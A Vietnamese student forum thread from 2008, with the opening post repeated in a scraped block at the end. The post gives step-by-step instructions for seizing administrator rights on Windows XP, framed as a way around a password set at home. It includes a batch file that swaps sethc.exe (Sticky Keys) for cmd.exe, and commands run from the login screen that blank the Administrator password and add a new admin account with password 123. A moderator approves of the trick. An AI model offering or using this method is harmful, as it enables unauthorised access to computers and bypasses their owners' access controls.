Chiếm quyền Admin của Windown XP ... ( Dành cho những ai bị đăt pass ở nhà ^^ )

Silver9x · 09-01-2008, 20:46

StickyKey là chương trình hộ trỡ dành cho người khuyết tật của Microsoft. Mỗi khi chúng ta ấn Shift 5 lần này là chương trình được gọi. Chương trình hoạt động với quyền cao nhât (Administrator). Chúng ta sẽ lợi dụng lỗ hổng này để đoạt lại quyền sử dụng Windows ^^!
Bước 1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để xem thử).
- Ngoài ra có thể copy file Pass.bat vào trong ổ cứng, sau đó chạy để thực hiện cũng được, không nhất thiết phải sử dụng tài khoản User bình thường. VD : Dùng đĩa mền copy trong DOS, ...
Bước 2: Bạn tạo làm sao được 1 file Pass.bat có code như sau :

Code:

cd %systemroot%/system32
rename sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y

Sau đó tất nhiên là chay file này

Đoạn mã này làm các nhiệm vụ sau:

1. Sao lưu lại file sethc.exe bằng cách đặt lại tên là sethc.exe.bk

2. Thay thế file sethc.exe bằng file cmd.exe

Đến đây, bạn nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì chương trình StickyKey thì bạn đã thành công!

Bước 3: Khởi động lại máy. Khi đến màn hình đăng nhập, bạn khoan hãy đăng nhập mà nhấn phím Shift 5 lần…… Lúc này chương trình Command Run xuất hiện, bạn nhập một trong những vào đoạn lệnh dưới đây

Xóa trắng password của Administrator:

Code:

net user Administrator

—- > nhấn phím Enter khi hoàn thành!

Thêm một tài khoản Admin với mật khẩu là 123

Code:

net user Admin 123 /add

—- > nhấn phím Enter khi hoàn thành!

Gán tài khoản Admin vào nhóm quản trị:

Code:

net localgroup Administrators Admin /add

—- > nhấn phím Enter khi hoàn thành!

Nếu bạn sử dụng đúng cấu trúc lệnh phía trên, bạn sẽ tạo được các tài khoản mới. Tại đây, bạn có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại máy!
Nếu ai chơi chộm thì chơi xong xóa cái tài khoản mới lập đi là xong

Nguồn : Học ông anh ^^!
Còn trả lại cái StickyKey thì del sethc.exe hiện thời rồi rename cái file sethc.exe.bk về sethc.exe là được .

Silver9x · 09-01-2008, 20:47

Nhân tiện cho hỏi bác Paint, sao 4rum nhà ta không đính kèm file được nhỉ =.=

haqduong · 09-01-2008, 20:51

Quote:

Originally Posted by Silver9x

Nhân tiện cho hỏi bác Paint, sao 4rum nhà ta không đính kèm file được nhỉ =.=

Chắc tại forum không đủ kinh phí tăng dung lượng lưu trữ

Mà phải chỉ cả cách khôi phục StickyKey về trạng thái ban đầu chứ

PS: Anh Paint cho em hỏi luôn: trường hợp như trên có phải câu bài không ạ?

Silver9x · 09-01-2008, 20:53

Hỏi thôi,câu bài thì cứ thoải mái del ^^. Định đính cái file trong cái bài viết ấy mà ^^

MrPaint · 09-01-2008, 21:44

Hê hê, cách này hay àh nha

Thực ra thì cái post thứ 2 hơi câu tí nhưng vì bài viết hay nên thôi, cứ để đấy

Không post được attach vì.... thực ra cũng chả rõ tại sao. Để xin chỉ thị cấp trên rồi enable lại nhé

PS: Mà tốt nhất nên up chỗ khác rồi để link vào chú ạh

09-01-2008, 20:46
Silver9x New Member Join Date: 06-09-2007 Posts: 18 KL$: 339 Awarded 3 time(s) Sent 11 thank(s) Received 7 thank(s) School: PTTH Kim Liên Class: A5 (2006-2009)	StickyKey là chương trình hộ trỡ dành cho người khuyết tật của Microsoft. Mỗi khi chúng ta ấn Shift 5 lần này là chương trình được gọi. Chương trình hoạt động với quyền cao nhât (Administrator). Chúng ta sẽ lợi dụng lỗ hổng này để đoạt lại quyền sử dụng Windows ^^! Bước 1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để xem thử). - Ngoài ra có thể copy file Pass.bat vào trong ổ cứng, sau đó chạy để thực hiện cũng được, không nhất thiết phải sử dụng tài khoản User bình thường. VD : Dùng đĩa mền copy trong DOS, ... Bước 2: Bạn tạo làm sao được 1 file Pass.bat có code như sau : Code: cd %systemroot%/system32 rename sethc.exe sethc.exe.bk copy cmd.exe sethc.exe /y Sau đó tất nhiên là chay file này Đoạn mã này làm các nhiệm vụ sau: 1. Sao lưu lại file sethc.exe bằng cách đặt lại tên là sethc.exe.bk 2. Thay thế file sethc.exe bằng file cmd.exe Đến đây, bạn nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì chương trình StickyKey thì bạn đã thành công! Bước 3: Khởi động lại máy. Khi đến màn hình đăng nhập, bạn khoan hãy đăng nhập mà nhấn phím Shift 5 lần…… Lúc này chương trình Command Run xuất hiện, bạn nhập một trong những vào đoạn lệnh dưới đây Xóa trắng password của Administrator: Code: net user Administrator —- > nhấn phím Enter khi hoàn thành! Thêm một tài khoản Admin với mật khẩu là 123 Code: net user Admin 123 /add —- > nhấn phím Enter khi hoàn thành! Gán tài khoản Admin vào nhóm quản trị: Code: net localgroup Administrators Admin /add —- > nhấn phím Enter khi hoàn thành! Nếu bạn sử dụng đúng cấu trúc lệnh phía trên, bạn sẽ tạo được các tài khoản mới. Tại đây, bạn có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại máy! Nếu ai chơi chộm thì chơi xong xóa cái tài khoản mới lập đi là xong Nguồn : Học ông anh ^^! Còn trả lại cái StickyKey thì del sethc.exe hiện thời rồi rename cái file sethc.exe.bk về sethc.exe là được . ------------------------------ Nothing is impossible !!!

09-01-2008, 20:47
Silver9x New Member Join Date: 06-09-2007 Posts: 18 KL$: 339 Awarded 3 time(s) Sent 11 thank(s) Received 7 thank(s) School: PTTH Kim Liên Class: A5 (2006-2009)	Nhân tiện cho hỏi bác Paint, sao 4rum nhà ta không đính kèm file được nhỉ =.= ------------------------------ Nothing is impossible !!!

09-01-2008, 20:53
Silver9x New Member Join Date: 06-09-2007 Posts: 18 KL$: 339 Awarded 3 time(s) Sent 11 thank(s) Received 7 thank(s) School: PTTH Kim Liên Class: A5 (2006-2009)	Hỏi thôi,câu bài thì cứ thoải mái del ^^. Định đính cái file trong cái bài viết ấy mà ^^ ------------------------------ Nothing is impossible !!!

09-01-2008, 21:44
MrPaint V.I.P Join Date: 23-08-2005 Posts: 2.707 KL$: 854 Awarded 46 time(s) Sent 489 thank(s) Received 558 thank(s) School: PTTH Kim Liên Class: A7 (2005-2008) Location: Hà Nội iu wí	Hê hê, cách này hay àh nha Thực ra thì cái post thứ 2 hơi câu tí nhưng vì bài viết hay nên thôi, cứ để đấy Không post được attach vì.... thực ra cũng chả rõ tại sao. Để xin chỉ thị cấp trên rồi enable lại nhé PS: Mà tốt nhất nên up chỗ khác rồi để link vào chú ạh ------------------------------ Click here: Show ảnh người yêu của mọi người (Câu thank )